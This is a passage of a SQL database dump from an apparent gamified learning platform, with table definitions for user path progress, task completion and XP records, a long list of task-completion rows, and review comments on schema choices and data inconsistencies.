(378, 297, 9, '2026-03-14 16:34:43', NULL, 0.00, NULL, '2026-03-14 16:34:43', '2026-03-14 16:34:43', NULL),
(379, 297, 1, '2026-03-14 16:40:04', NULL, 0.00, NULL, '2026-03-14 16:40:04', '2026-03-14 16:40:04', NULL),
(380, 298, 9, '2026-03-14 18:38:44', NULL, 0.00, NULL, '2026-03-14 18:38:44', '2026-03-14 18:38:44', NULL),
(381, 299, 9, '2026-03-14 21:38:03', NULL, 0.00, NULL, '2026-03-14 21:38:03', '2026-03-14 21:38:03', NULL),
(382, 283, 2, '2026-03-14 22:00:48', NULL, 0.00, NULL, '2026-03-14 22:00:48', '2026-03-14 22:00:48', NULL),
(383, 283, 3, '2026-03-14 22:01:53', NULL, 0.00, NULL, '2026-03-14 22:01:53', '2026-03-14 22:01:53', NULL),
(384, 283, 1, '2026-03-14 22:04:39', NULL, 0.00, NULL, '2026-03-14 22:04:39', '2026-03-14 22:04:39', NULL),
(385, 298, 3, '2026-03-14 22:54:39', NULL, 0.00, NULL, '2026-03-14 22:54:39', '2026-03-14 22:54:39', NULL),
(386, 283, 6, '2026-03-14 23:11:26', NULL, 0.00, NULL, '2026-03-14 23:11:26', '2026-03-14 23:11:26', NULL),
(387, 300, 9, '2026-03-14 23:27:23', NULL, 0.00, NULL, '2026-03-14 23:27:23', '2026-03-14 23:27:23', NULL),
(388, 301, 9, '2026-03-15 07:46:34', NULL, 0.00, NULL, '2026-03-15 07:46:34', '2026-03-15 07:46:34', NULL),
(389, 302, 9, '2026-03-15 10:47:31', NULL, 0.00, NULL, '2026-03-15 10:47:31', '2026-03-15 10:47:31', NULL),
(390, 303, 9, '2026-03-15 17:12:43', NULL, 0.00, NULL, '2026-03-15 17:12:43', '2026-03-15 17:12:43', NULL),
(391, 303, 3, '2026-03-15 17:15:47', NULL, 1.15, NULL, '2026-03-15 17:15:47', '2026-03-15 17:37:43', NULL),
(392, 304, 9, '2026-03-15 17:28:08', NULL, 0.00, NULL, '2026-03-15 17:28:08', '2026-03-15 17:28:08', NULL),
(393, 305, 9, '2026-03-15 17:51:16', NULL, 0.00, NULL, '2026-03-15 17:51:16', '2026-03-15 17:51:16', NULL),
(394, 306, 9, '2026-03-15 18:10:21', NULL, 0.00, NULL, '2026-03-15 18:10:21', '2026-03-15 18:10:21', NULL),
(395, 307, 9, '2026-03-15 18:38:43', NULL, 0.00, NULL, '2026-03-15 18:38:43', '2026-03-15 18:38:43', NULL),
(396, 28, 6, '2026-03-15 21:17:16', NULL, 0.00, NULL, '2026-03-15 21:17:16', '2026-03-15 21:17:16', NULL),
(397, 283, 4, '2026-03-15 22:35:15', NULL, 0.00, NULL, '2026-03-15 22:35:15', '2026-03-15 22:35:15', NULL),
(398, 283, 12, '2026-03-15 22:35:47', NULL, 0.00, NULL, '2026-03-15 22:35:47', '2026-03-15 22:35:47', NULL),
(399, 308, 9, '2026-03-16 01:42:40', NULL, 0.00, NULL, '2026-03-16 01:42:40', '2026-03-16 01:42:40', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `user_path_specialization`
--

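--
-- Per-user progress record for one learning path (`path_code`): level, XP,
-- completion counters and a running average score.
--
-- Storage: the dump runs under START TRANSACTION and the neighbouring
-- `user_task_progress` table is InnoDB/utf8mb4, so this table is declared
-- the same way instead of the original MyISAM/latin1 — MyISAM is
-- non-transactional and does not enforce FOREIGN KEY constraints, and
-- latin1 differs from the utf8mb4 used elsewhere in the visible schema.
--
-- No key or index is declared here; phpMyAdmin dumps normally add them in a
-- later ALTER TABLE section of the same file — confirm before adding any
-- PRIMARY KEY/UNIQUE inline, or the later ALTER will fail as a duplicate.
-- `user_id` presumably references a users table; no FK is declared here.
--
CREATE TABLE `user_path_specialization` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `path_code` varchar(20) NOT NULL,
  `level` int(11) DEFAULT 1,
  `xp` int(11) DEFAULT 0,
  `alerts_completed` int(11) DEFAULT 0,
  `missions_completed` int(11) DEFAULT 0,
  `average_score` decimal(5,2) DEFAULT 0.00,   -- 0.00 .. 999.99 representable; percentage semantics assumed, confirm
  `last_activity_date` datetime DEFAULT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;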

-- --------------------------------------------------------

--
-- Table structure for table `user_task_progress`
--

--
-- One row per (user, task) pair recording whether the task has been
-- completed and when. `user_id`/`task_id` presumably reference the users and
-- tasks tables; no FOREIGN KEY is declared here, and no PRIMARY KEY either
-- (phpMyAdmin dumps usually add keys in a later ALTER TABLE section — confirm).
--
CREATE TABLE `user_task_progress` (
  `id`           INT(11)    NOT NULL,
  `user_id`      INT(11)    NOT NULL,
  `task_id`      INT(11)    NOT NULL,
  `completed`    TINYINT(1) DEFAULT 0,                        -- 0/1 flag; rows start incomplete
  `completed_at` TIMESTAMP  NULL DEFAULT NULL,                -- NULL until completed
  `created_at`   TIMESTAMP  NULL DEFAULT CURRENT_TIMESTAMP,
  `updated_at`   TIMESTAMP  NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_task_progress`
--

INSERT INTO `user_task_progress` (`id`, `user_id`, `task_id`, `completed`, `completed_at`, `created_at`, `updated_at`) VALUES
(1, 34, 1, 1, '2025-12-26 01:00:05', '2025-12-26 01:00:05', '2025-12-26 01:00:05'),
(2, 34, 5, 1, '2025-12-26 01:02:04', '2025-12-26 01:02:04', '2025-12-26 01:02:04'),
(3, 34, 2, 1, '2025-12-26 01:04:03', '2025-12-26 01:04:03', '2025-12-26 01:04:03'),
(4, 34, 3, 1, '2025-12-26 02:00:03', '2025-12-26 02:00:03', '2025-12-26 02:00:03'),
(5, 1, 1, 1, '2025-12-26 15:29:20', '2025-12-26 15:29:20', '2025-12-26 15:29:20'),
(6, 34, 349, 1, '2025-12-26 18:31:49', '2025-12-26 18:31:49', '2025-12-26 18:31:49'),
(7, 34, 350, 1, '2025-12-26 19:11:06', '2025-12-26 19:11:06', '2025-12-26 19:11:06'),
(8, 34, 6, 1, '2025-12-26 20:10:11', '2025-12-26 20:10:11', '2025-12-26 20:10:11'),
(9, 34, 7, 1, '2025-12-26 20:14:32', '2025-12-26 20:14:32', '2025-12-26 20:14:32'),
(10, 34, 8, 1, '2025-12-26 20:20:31', '2025-12-26 20:20:31', '2025-12-26 20:20:31'),
(11, 34, 9, 1, '2025-12-26 20:22:23', '2025-12-26 20:22:23', '2025-12-26 20:22:23'),
(12, 34, 10, 1, '2025-12-26 20:26:35', '2025-12-26 20:26:35', '2025-12-26 20:26:35'),
(13, 34, 11, 1, '2025-12-26 20:28:07', '2025-12-26 20:28:07', '2025-12-26 20:28:07'),
(14, 34, 12, 1, '2025-12-26 20:29:15', '2025-12-26 20:29:15', '2025-12-26 20:29:15'),
(15, 34, 32, 1, '2025-12-26 20:44:41', '2025-12-26 20:44:41', '2025-12-26 20:44:41'),
(16, 34, 33, 1, '2025-12-26 20:46:41', '2025-12-26 20:46:41', '2025-12-26 20:46:41'),
(17, 34, 54, 1, '2025-12-26 21:14:00', '2025-12-26 21:14:00', '2025-12-26 21:14:00'),
(18, 1, 771, 1, '2025-12-29 13:53:27', '2025-12-29 13:53:27', '2025-12-29 13:53:27'),
(19, 42, 1, 1, '2025-12-30 13:40:31', '2025-12-30 13:40:31', '2025-12-30 13:40:31'),
(20, 42, 2, 1, '2025-12-30 13:41:34', '2025-12-30 13:41:34', '2025-12-30 13:41:34'),
(21, 42, 3, 1, '2025-12-30 13:42:10', '2025-12-30 13:42:10', '2025-12-30 13:42:10'),
(22, 42, 4, 1, '2025-12-30 13:42:41', '2025-12-30 13:42:41', '2025-12-30 13:42:41'),
(23, 42, 5, 1, '2025-12-30 13:43:10', '2025-12-30 13:43:10', '2025-12-30 13:43:10'),
(24, 42, 22, 1, '2025-12-30 13:45:54', '2025-12-30 13:45:54', '2025-12-30 13:45:54'),
(25, 42, 23, 1, '2025-12-30 13:46:37', '2025-12-30 13:46:37', '2025-12-30 13:46:37'),
(26, 42, 24, 1, '2025-12-30 13:47:42', '2025-12-30 13:47:42', '2025-12-30 13:47:42'),
(27, 42, 25, 1, '2025-12-30 13:50:19', '2025-12-30 13:50:19', '2025-12-30 13:50:19'),
(28, 42, 26, 1, '2025-12-30 13:51:39', '2025-12-30 13:51:39', '2025-12-30 13:51:39'),
(29, 42, 27, 1, '2025-12-30 13:52:49', '2025-12-30 13:52:49', '2025-12-30 13:52:49'),
(30, 42, 28, 1, '2025-12-30 13:53:51', '2025-12-30 13:53:51', '2025-12-30 13:53:51'),
(31, 65, 1, 1, '2026-01-06 16:28:31', '2026-01-06 16:28:31', '2026-01-06 16:28:31'),
(32, 74, 1, 1, '2026-01-12 06:32:13', '2026-01-12 06:32:13', '2026-01-12 06:32:13'),
(33, 74, 54, 1, '2026-01-12 06:52:12', '2026-01-12 06:52:12', '2026-01-12 06:52:12'),
(34, 74, 2, 1, '2026-01-17 08:38:34', '2026-01-17 08:38:34', '2026-01-17 08:38:34'),
(35, 74, 3, 1, '2026-01-17 08:39:31', '2026-01-17 08:39:31', '2026-01-17 08:39:31'),
(36, 74, 4, 1, '2026-01-17 08:40:24', '2026-01-17 08:40:24', '2026-01-17 08:40:24'),
(37, 74, 5, 1, '2026-01-17 08:41:02', '2026-01-17 08:41:02', '2026-01-17 08:41:02'),
(38, 107, 2, 1, '2026-02-02 15:00:17', '2026-02-02 15:00:17', '2026-02-02 15:00:17'),
(39, 107, 3, 1, '2026-02-02 15:12:49', '2026-02-02 15:12:49', '2026-02-02 15:12:49'),
(40, 107, 4, 1, '2026-02-02 15:17:44', '2026-02-02 15:17:44', '2026-02-02 15:17:44'),
(41, 107, 5, 1, '2026-02-02 15:21:56', '2026-02-02 15:21:56', '2026-02-02 15:21:56'),
(42, 107, 1, 1, '2026-02-02 15:27:10', '2026-02-02 15:27:10', '2026-02-02 15:27:10'),
(43, 34, 359, 1, '2026-02-05 19:28:01', '2026-02-05 19:28:01', '2026-02-05 19:28:01'),
(44, 183, 54, 1, '2026-02-20 04:23:32', '2026-02-20 04:23:32', '2026-02-20 04:23:32'),
(45, 214, 54, 1, '2026-02-27 06:31:25', '2026-02-27 06:31:25', '2026-02-27 06:31:25'),
(46, 214, 55, 1, '2026-02-27 06:36:08', '2026-02-27 06:36:08', '2026-02-27 06:36:08'),
(47, 232, 221, 1, '2026-03-03 06:05:08', '2026-03-03 06:05:08', '2026-03-03 06:05:08'),
(48, 232, 222, 1, '2026-03-04 03:50:31', '2026-03-04 03:50:31', '2026-03-04 03:50:31'),
(49, 232, 223, 1, '2026-03-04 03:56:30', '2026-03-04 03:56:30', '2026-03-04 03:56:30'),
(50, 232, 224, 1, '2026-03-04 04:43:37', '2026-03-04 04:43:37', '2026-03-04 04:43:37'),
(51, 232, 225, 1, '2026-03-04 04:44:54', '2026-03-04 04:44:54', '2026-03-04 04:44:54'),
(52, 232, 226, 1, '2026-03-04 04:52:03', '2026-03-04 04:52:03', '2026-03-04 04:52:03'),
(53, 232, 227, 1, '2026-03-04 16:17:55', '2026-03-04 16:17:55', '2026-03-04 16:17:55'),
(54, 232, 228, 1, '2026-03-04 16:19:09', '2026-03-04 16:19:09', '2026-03-04 16:19:09'),
(55, 237, 1, 1, '2026-03-04 16:20:30', '2026-03-04 16:20:30', '2026-03-04 16:20:30'),
(56, 232, 231, 1, '2026-03-05 04:02:10', '2026-03-05 04:02:10', '2026-03-05 04:02:10'),
(57, 225, 1, 1, '2026-03-05 04:46:03', '2026-03-05 04:46:03', '2026-03-05 04:46:03'),
(58, 225, 2, 1, '2026-03-05 04:49:22', '2026-03-05 04:49:22', '2026-03-05 04:49:22'),
(59, 225, 3, 1, '2026-03-05 04:53:13', '2026-03-05 04:53:13', '2026-03-05 04:53:13'),
(60, 225, 4, 1, '2026-03-05 04:55:06', '2026-03-05 04:55:06', '2026-03-05 04:55:06'),
(61, 225, 5, 1, '2026-03-05 04:56:38', '2026-03-05 04:56:38', '2026-03-05 04:56:38'),
(62, 232, 232, 1, '2026-03-05 05:26:14', '2026-03-05 05:26:14', '2026-03-05 05:26:14'),
(63, 232, 233, 1, '2026-03-05 05:30:25', '2026-03-05 05:30:25', '2026-03-05 05:30:25'),
(64, 260, 1, 1, '2026-03-07 11:50:16', '2026-03-07 11:50:16', '2026-03-07 11:50:16'),
(65, 232, 234, 1, '2026-03-07 15:09:30', '2026-03-07 15:09:30', '2026-03-07 15:09:30'),
(66, 232, 235, 1, '2026-03-08 09:13:57', '2026-03-08 09:13:57', '2026-03-08 09:13:57'),
(67, 260, 2, 1, '2026-03-08 09:14:32', '2026-03-08 09:14:32', '2026-03-08 09:14:32'),
(68, 232, 236, 1, '2026-03-08 09:15:35', '2026-03-08 09:15:35', '2026-03-08 09:15:35'),
(69, 260, 3, 1, '2026-03-08 09:33:23', '2026-03-08 09:33:23', '2026-03-08 09:33:23'),
(70, 260, 4, 1, '2026-03-08 09:46:06', '2026-03-08 09:46:06', '2026-03-08 09:46:06'),
(71, 232, 241, 1, '2026-03-08 09:47:57', '2026-03-08 09:47:57', '2026-03-08 09:47:57'),
(72, 232, 242, 1, '2026-03-08 09:50:04', '2026-03-08 09:50:04', '2026-03-08 09:50:04'),
(73, 260, 5, 1, '2026-03-08 09:56:56', '2026-03-08 09:56:56', '2026-03-08 09:56:56'),
(74, 232, 243, 1, '2026-03-08 10:16:50', '2026-03-08 10:16:50', '2026-03-08 10:16:50'),
(75, 232, 244, 1, '2026-03-08 10:18:46', '2026-03-08 10:18:46', '2026-03-08 10:18:46'),
(76, 232, 245, 1, '2026-03-08 10:21:33', '2026-03-08 10:21:33', '2026-03-08 10:21:33'),
(77, 232, 246, 1, '2026-03-08 10:35:49', '2026-03-08 10:35:49', '2026-03-08 10:35:49'),
(78, 232, 247, 1, '2026-03-08 10:37:56', '2026-03-08 10:37:56', '2026-03-08 10:37:56'),
(79, 232, 251, 1, '2026-03-08 11:26:58', '2026-03-08 11:26:58', '2026-03-08 11:26:58'),
(80, 232, 252, 1, '2026-03-08 14:19:55', '2026-03-08 14:19:55', '2026-03-08 14:19:55'),
(81, 232, 253, 1, '2026-03-08 14:25:49', '2026-03-08 14:25:49', '2026-03-08 14:25:49'),
(82, 232, 254, 1, '2026-03-08 14:33:28', '2026-03-08 14:33:28', '2026-03-08 14:33:28'),
(83, 232, 255, 1, '2026-03-08 14:46:03', '2026-03-08 14:46:03', '2026-03-08 14:46:03'),
(84, 232, 256, 1, '2026-03-08 14:47:32', '2026-03-08 14:47:32', '2026-03-08 14:47:32'),
(85, 232, 261, 1, '2026-03-09 13:56:58', '2026-03-09 13:56:58', '2026-03-09 13:56:58'),
(86, 232, 262, 1, '2026-03-09 13:58:29', '2026-03-09 13:58:29', '2026-03-09 13:58:29'),
(87, 232, 263, 1, '2026-03-09 14:00:37', '2026-03-09 14:00:37', '2026-03-09 14:00:37'),
(88, 232, 264, 1, '2026-03-09 14:03:33', '2026-03-09 14:03:33', '2026-03-09 14:03:33'),
(89, 232, 265, 1, '2026-03-09 14:04:53', '2026-03-09 14:04:53', '2026-03-09 14:04:53'),
(90, 232, 266, 1, '2026-03-09 14:12:51', '2026-03-09 14:12:51', '2026-03-09 14:12:51'),
(91, 232, 267, 1, '2026-03-09 14:13:37', '2026-03-09 14:13:37', '2026-03-09 14:13:37'),
(92, 232, 272, 1, '2026-03-09 17:37:40', '2026-03-09 17:37:40', '2026-03-09 17:37:40'),
(93, 232, 273, 1, '2026-03-09 17:54:56', '2026-03-09 17:54:56', '2026-03-09 17:54:56'),
(94, 232, 274, 1, '2026-03-09 18:04:05', '2026-03-09 18:04:05', '2026-03-09 18:04:05'),
(95, 232, 275, 1, '2026-03-09 18:05:08', '2026-03-09 18:05:08', '2026-03-09 18:05:08'),
(96, 232, 276, 1, '2026-03-09 18:06:01', '2026-03-09 18:06:01', '2026-03-09 18:06:01'),
(97, 232, 277, 1, '2026-03-09 18:06:55', '2026-03-09 18:06:55', '2026-03-09 18:06:55'),
(98, 232, 278, 1, '2026-03-09 18:07:53', '2026-03-09 18:07:53', '2026-03-09 18:07:53'),
(99, 232, 271, 1, '2026-03-09 18:08:51', '2026-03-09 18:08:51', '2026-03-09 18:08:51'),
(100, 232, 281, 1, '2026-03-09 18:09:50', '2026-03-09 18:09:50', '2026-03-09 18:09:50'),
(101, 232, 282, 1, '2026-03-09 18:10:33', '2026-03-09 18:10:33', '2026-03-09 18:10:33'),
(102, 232, 283, 1, '2026-03-09 18:11:19', '2026-03-09 18:11:19', '2026-03-09 18:11:19'),
(103, 232, 284, 1, '2026-03-09 18:12:22', '2026-03-09 18:12:22', '2026-03-09 18:12:22'),
(104, 232, 285, 1, '2026-03-09 18:13:08', '2026-03-09 18:13:08', '2026-03-09 18:13:08'),
(105, 232, 286, 1, '2026-03-09 18:13:51', '2026-03-09 18:13:51', '2026-03-09 18:13:51'),
(106, 232, 287, 1, '2026-03-09 18:14:24', '2026-03-09 18:14:24', '2026-03-09 18:14:24'),
(107, 232, 296, 1, '2026-03-10 16:36:41', '2026-03-10 16:36:41', '2026-03-10 16:36:41'),
(108, 232, 297, 1, '2026-03-10 16:37:30', '2026-03-10 16:37:30', '2026-03-10 16:37:30'),
(109, 232, 291, 1, '2026-03-10 16:42:22', '2026-03-10 16:42:22', '2026-03-10 16:42:22'),
(110, 232, 292, 1, '2026-03-10 16:46:21', '2026-03-10 16:46:21', '2026-03-10 16:46:21'),
(111, 232, 293, 1, '2026-03-10 16:56:35', '2026-03-10 16:56:35', '2026-03-10 16:56:35'),
(112, 232, 294, 1, '2026-03-10 16:58:05', '2026-03-10 16:58:05', '2026-03-10 16:58:05'),
(113, 232, 295, 1, '2026-03-10 17:05:44', '2026-03-10 17:05:44', '2026-03-10 17:05:44'),
(114, 232, 301, 1, '2026-03-10 17:32:44', '2026-03-10 17:32:44', '2026-03-10 17:32:44'),
(115, 232, 302, 1, '2026-03-10 17:37:09', '2026-03-10 17:37:09', '2026-03-10 17:37:09'),
(116, 232, 303, 1, '2026-03-10 17:40:12', '2026-03-10 17:40:12', '2026-03-10 17:40:12'),
(117, 232, 304, 1, '2026-03-10 17:48:57', '2026-03-10 17:48:57', '2026-03-10 17:48:57'),
(118, 232, 305, 1, '2026-03-10 17:51:34', '2026-03-10 17:51:34', '2026-03-10 17:51:34'),
(119, 232, 306, 1, '2026-03-10 17:54:28', '2026-03-10 17:54:28', '2026-03-10 17:54:28'),
(120, 232, 307, 1, '2026-03-10 17:54:51', '2026-03-10 17:54:51', '2026-03-10 17:54:51'),
(121, 225, 32, 1, '2026-03-10 22:49:31', '2026-03-10 22:49:31', '2026-03-10 22:49:31'),
(122, 225, 33, 1, '2026-03-10 22:54:36', '2026-03-10 22:54:36', '2026-03-10 22:54:36'),
(123, 225, 34, 1, '2026-03-11 04:06:24', '2026-03-11 04:06:24', '2026-03-11 04:06:24'),
(124, 260, 22, 1, '2026-03-11 04:52:11', '2026-03-11 04:52:11', '2026-03-11 04:52:11'),
(125, 260, 23, 1, '2026-03-11 04:57:08', '2026-03-11 04:57:08', '2026-03-11 04:57:08'),
(126, 232, 311, 1, '2026-03-11 16:47:51', '2026-03-11 16:47:51', '2026-03-11 16:47:51'),
(127, 232, 312, 1, '2026-03-11 16:54:38', '2026-03-11 16:54:38', '2026-03-11 16:54:38'),
(128, 232, 313, 1, '2026-03-11 17:07:42', '2026-03-11 17:07:42', '2026-03-11 17:07:42'),
(129, 232, 314, 1, '2026-03-11 17:10:35', '2026-03-11 17:10:35', '2026-03-11 17:10:35'),
(130, 232, 315, 1, '2026-03-11 17:11:59', '2026-03-11 17:11:59', '2026-03-11 17:11:59'),
(131, 232, 316, 1, '2026-03-11 17:15:46', '2026-03-11 17:15:46', '2026-03-11 17:15:46'),
(132, 225, 35, 1, '2026-03-12 03:20:06', '2026-03-12 03:20:06', '2026-03-12 03:20:06'),
(133, 225, 36, 1, '2026-03-12 03:22:44', '2026-03-12 03:22:44', '2026-03-12 03:22:44'),
(134, 225, 37, 1, '2026-03-12 04:05:07', '2026-03-12 04:05:07', '2026-03-12 04:05:07'),
(135, 225, 38, 1, '2026-03-12 05:09:40', '2026-03-12 05:09:40', '2026-03-12 05:09:40'),
(136, 225, 39, 1, '2026-03-12 05:13:48', '2026-03-12 05:13:48', '2026-03-12 05:13:48'),
(137, 225, 22, 1, '2026-03-12 05:21:05', '2026-03-12 05:21:05', '2026-03-12 05:21:05'),
(138, 225, 23, 1, '2026-03-12 05:22:49', '2026-03-12 05:22:49', '2026-03-12 05:22:49'),
(139, 225, 24, 1, '2026-03-12 05:24:54', '2026-03-12 05:24:54', '2026-03-12 05:24:54'),
(140, 225, 25, 1, '2026-03-12 05:28:37', '2026-03-12 05:28:37', '2026-03-12 05:28:37'),
(141, 225, 26, 1, '2026-03-12 05:30:18', '2026-03-12 05:30:18', '2026-03-12 05:30:18'),
(142, 225, 27, 1, '2026-03-12 05:31:38', '2026-03-12 05:31:38', '2026-03-12 05:31:38'),
(143, 225, 28, 1, '2026-03-12 05:33:03', '2026-03-12 05:33:03', '2026-03-12 05:33:03'),
(144, 225, 30, 1, '2026-03-12 05:34:29', '2026-03-12 05:34:29', '2026-03-12 05:34:29'),
(145, 225, 31, 1, '2026-03-12 05:36:52', '2026-03-12 05:36:52', '2026-03-12 05:36:52'),
(146, 42, 350, 1, '2026-03-12 11:48:00', '2026-03-12 11:48:00', '2026-03-12 11:48:00'),
(147, 283, 350, 1, '2026-03-12 12:08:06', '2026-03-12 12:08:06', '2026-03-12 12:08:06'),
(148, 283, 351, 1, '2026-03-12 12:26:01', '2026-03-12 12:26:01', '2026-03-12 12:26:01'),
(149, 283, 352, 1, '2026-03-12 12:36:02', '2026-03-12 12:36:02', '2026-03-12 12:36:02'),
(150, 283, 353, 1, '2026-03-12 12:52:02', '2026-03-12 12:52:02', '2026-03-12 12:52:02'),
(151, 283, 359, 1, '2026-03-12 13:11:01', '2026-03-12 13:11:01', '2026-03-12 13:11:01'),
(152, 283, 360, 1, '2026-03-12 13:24:00', '2026-03-12 13:24:00', '2026-03-12 13:24:00'),
(153, 283, 349, 1, '2026-03-12 21:48:00', '2026-03-12 21:48:00', '2026-03-12 21:48:00'),
(154, 225, 40, 1, '2026-03-13 02:27:17', '2026-03-13 02:27:17', '2026-03-13 02:27:17'),
(155, 225, 41, 1, '2026-03-13 02:33:06', '2026-03-13 02:33:06', '2026-03-13 02:33:06'),
(156, 225, 42, 1, '2026-03-13 02:35:33', '2026-03-13 02:35:33', '2026-03-13 02:35:33'),
(157, 225, 43, 1, '2026-03-13 02:36:38', '2026-03-13 02:36:38', '2026-03-13 02:36:38'),
(158, 225, 44, 1, '2026-03-13 02:38:02', '2026-03-13 02:38:02', '2026-03-13 02:38:02'),
(159, 225, 45, 1, '2026-03-13 02:39:30', '2026-03-13 02:39:30', '2026-03-13 02:39:30'),
(160, 225, 46, 1, '2026-03-13 02:41:07', '2026-03-13 02:41:07', '2026-03-13 02:41:07'),
(161, 225, 47, 1, '2026-03-13 02:43:55', '2026-03-13 02:43:55', '2026-03-13 02:43:55'),
(162, 225, 349, 1, '2026-03-13 03:00:01', '2026-03-13 03:00:01', '2026-03-13 03:00:01'),
(163, 225, 350, 1, '2026-03-13 03:04:01', '2026-03-13 03:04:01', '2026-03-13 03:04:01'),
(164, 225, 351, 1, '2026-03-13 03:31:03', '2026-03-13 03:31:03', '2026-03-13 03:31:03'),
(165, 232, 324, 1, '2026-03-13 16:06:33', '2026-03-13 16:06:33', '2026-03-13 16:06:33'),
(166, 232, 325, 1, '2026-03-13 16:09:15', '2026-03-13 16:09:15', '2026-03-13 16:09:15'),
(167, 232, 326, 1, '2026-03-13 16:10:25', '2026-03-13 16:10:25', '2026-03-13 16:10:25'),
(168, 232, 321, 1, '2026-03-13 16:15:55', '2026-03-13 16:15:55', '2026-03-13 16:15:55'),
(169, 232, 322, 1, '2026-03-13 16:17:25', '2026-03-13 16:17:25', '2026-03-13 16:17:25'),
(170, 232, 323, 1, '2026-03-13 16:18:41', '2026-03-13 16:18:41', '2026-03-13 16:18:41'),
(171, 232, 331, 1, '2026-03-14 04:50:03', '2026-03-14 04:50:03', '2026-03-14 04:50:03'),
(172, 232, 332, 1, '2026-03-14 04:52:42', '2026-03-14 04:52:42', '2026-03-14 04:52:42'),
(173, 232, 333, 1, '2026-03-14 04:56:28', '2026-03-14 04:56:28', '2026-03-14 04:56:28'),
(174, 232, 334, 1, '2026-03-14 04:57:45', '2026-03-14 04:57:45', '2026-03-14 04:57:45'),
(175, 232, 335, 1, '2026-03-14 04:58:49', '2026-03-14 04:58:49', '2026-03-14 04:58:49'),
(176, 232, 336, 1, '2026-03-14 04:59:17', '2026-03-14 04:59:17', '2026-03-14 04:59:17'),
(177, 232, 341, 1, '2026-03-14 05:01:01', '2026-03-14 05:01:01', '2026-03-14 05:01:01'),
(178, 232, 342, 1, '2026-03-14 05:02:11', '2026-03-14 05:02:11', '2026-03-14 05:02:11'),
(179, 232, 343, 1, '2026-03-14 05:03:17', '2026-03-14 05:03:17', '2026-03-14 05:03:17'),
(180, 232, 344, 1, '2026-03-14 05:03:58', '2026-03-14 05:03:58', '2026-03-14 05:03:58'),
(181, 232, 345, 1, '2026-03-14 05:04:34', '2026-03-14 05:04:34', '2026-03-14 05:04:34'),
(182, 232, 346, 1, '2026-03-14 05:05:01', '2026-03-14 05:05:01', '2026-03-14 05:05:01'),
(183, 232, 364, 1, '2026-03-14 17:18:39', '2026-03-14 17:18:39', '2026-03-14 17:18:39'),
(184, 225, 352, 1, '2026-03-15 10:41:01', '2026-03-15 10:41:01', '2026-03-15 10:41:01'),
(185, 225, 353, 1, '2026-03-15 10:51:00', '2026-03-15 10:51:00', '2026-03-15 10:51:00'),
(186, 260, 24, 1, '2026-03-15 13:50:58', '2026-03-15 13:50:58', '2026-03-15 13:50:58'),
(187, 260, 25, 1, '2026-03-15 14:01:10', '2026-03-15 14:01:10', '2026-03-15 14:01:10'),
(188, 260, 26, 1, '2026-03-15 14:12:56', '2026-03-15 14:12:56', '2026-03-15 14:12:56'),
(189, 232, 365, 1, '2026-03-15 16:00:00', '2026-03-15 16:00:00', '2026-03-15 16:00:00'),
(190, 260, 27, 1, '2026-03-15 16:04:37', '2026-03-15 16:04:37', '2026-03-15 16:04:37'),
(191, 260, 28, 1, '2026-03-15 16:15:06', '2026-03-15 16:15:06', '2026-03-15 16:15:06'),
(192, 260, 30, 1, '2026-03-15 16:29:36', '2026-03-15 16:29:36', '2026-03-15 16:29:36'),
(193, 260, 31, 1, '2026-03-15 16:59:18', '2026-03-15 16:59:18', '2026-03-15 16:59:18'),
(194, 232, 361, 1, '2026-03-15 17:12:38', '2026-03-15 17:12:38', '2026-03-15 17:12:38'),
(195, 303, 221, 1, '2026-03-15 17:37:43', '2026-03-15 17:37:43', '2026-03-15 17:37:43'),
(196, 232, 362, 1, '2026-03-15 18:05:01', '2026-03-15 18:05:01', '2026-03-15 18:05:01'),
(197, 260, 40, 1, '2026-03-15 18:10:50', '2026-03-15 18:10:50', '2026-03-15 18:10:50'),
(198, 232, 363, 1, '2026-03-15 18:14:02', '2026-03-15 18:14:02', '2026-03-15 18:14:02'),
(199, 232, 366, 1, '2026-03-15 18:20:01', '2026-03-15 18:20:01', '2026-03-15 18:20:01'),
(200, 260, 41, 1, '2026-03-15 18:24:14', '2026-03-15 18:24:14', '2026-03-15 18:24:14'),
(201, 260, 42, 1, '2026-03-15 18:57:22', '2026-03-15 18:57:22', '2026-03-15 18:57:22'),
(202, 260, 43, 1, '2026-03-15 19:44:15', '2026-03-15 19:44:15', '2026-03-15 19:44:15'),
(203, 260, 44, 1, '2026-03-15 20:23:12', '2026-03-15 20:23:12', '2026-03-15 20:23:12'),
(204, 260, 45, 1, '2026-03-15 20:44:14', '2026-03-15 20:44:14', '2026-03-15 20:44:14'),
(205, 260, 46, 1, '2026-03-15 21:16:41', '2026-03-15 21:16:41', '2026-03-15 21:16:41'),
(206, 260, 47, 1, '2026-03-15 21:27:59', '2026-03-15 21:27:59', '2026-03-15 21:27:59'),
(207, 225, 359, 1, '2026-03-16 02:59:00', '2026-03-16 02:59:00', '2026-03-16 02:59:00'),
(208, 225, 360, 1, '2026-03-16 03:07:01', '2026-03-16 03:07:01', '2026-03-16 03:07:01'),
(209, 225, 367, 1, '2026-03-16 03:19:04', '2026-03-16 03:19:04', '2026-03-16 03:19:04');

-- --------------------------------------------------------

--
-- Table structure for table `user_xp`
--

CREATE TABLE `user_xp` (
  -- One XP / level record per user. `user_id` is made the primary key by the
  -- ALTER TABLE in the "Indexes for table `user_xp`" section further down; no
  -- foreign key to `users` appears anywhere in this part of the dump.
  `user_id` int(11) NOT NULL,
  -- Every counter below is nullable (no NOT NULL) and merely defaults; nothing
  -- in this statement constrains them (no CHECK, no relation between them).
  -- NOTE(review): the dumped rows contain monthly_xp > total_xp (user_id 225,
  -- 232, 283), which the schema allows -- confirm whether that is intended.
  `total_xp` int(11) DEFAULT 0,
  `monthly_xp` int(11) DEFAULT 0,
  `current_level` int(11) DEFAULT 1,
  `xp_to_next_level` int(11) DEFAULT 100,
  `streak_days` int(11) DEFAULT 0,
  -- Calendar date only (DATE, not TIMESTAMP); NOTE(review): in the dumped rows
  -- it is sometimes one day ahead of `updated_at`, so it appears to be computed
  -- in a different time zone from the timestamp columns -- confirm before using
  -- it for streak logic.
  `last_activity_date` date DEFAULT NULL,
